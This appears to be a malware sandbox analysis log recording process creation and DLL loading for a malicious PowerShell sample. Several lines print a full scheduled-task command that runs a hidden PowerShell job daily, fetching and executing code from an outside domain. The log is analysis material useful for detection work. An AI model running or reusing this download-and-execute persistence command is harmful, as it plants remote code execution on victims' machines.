                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k schtasks /create /sc daily /tn LocalMCleaner /tr "Powershell -WindowStyle Hidden irm http://ofc.mofserviceserver.top/DSCTSC/|Powershell" /st 10:13 /f
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /tn LocalMCleaner /tr "Powershell -WindowStyle Hidden irm http://ofc.mofserviceserver.top/DSCTSC/|Powershell" /st 10:13 /f
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.EXE -WindowStyle Hidden irm http://ofc.mofserviceserver.top/DSCTSC/|Powershell
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" www.nadra.gov.pkJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.yahoo.comJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.protonmail.comJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://pmo.gov.pk/site/404Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1916,i,14445282091827991487,7005601379036879201,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k schtasks /create /sc daily /tn LocalMCleaner /tr "Powershell -WindowStyle Hidden irm http://ofc.mofserviceserver.top/DSCTSC/|Powershell" /st 10:13 /fJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /tn LocalMCleaner /tr "Powershell -WindowStyle Hidden irm http://ofc.mofserviceserver.top/DSCTSC/|Powershell" /st 10:13 /fJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
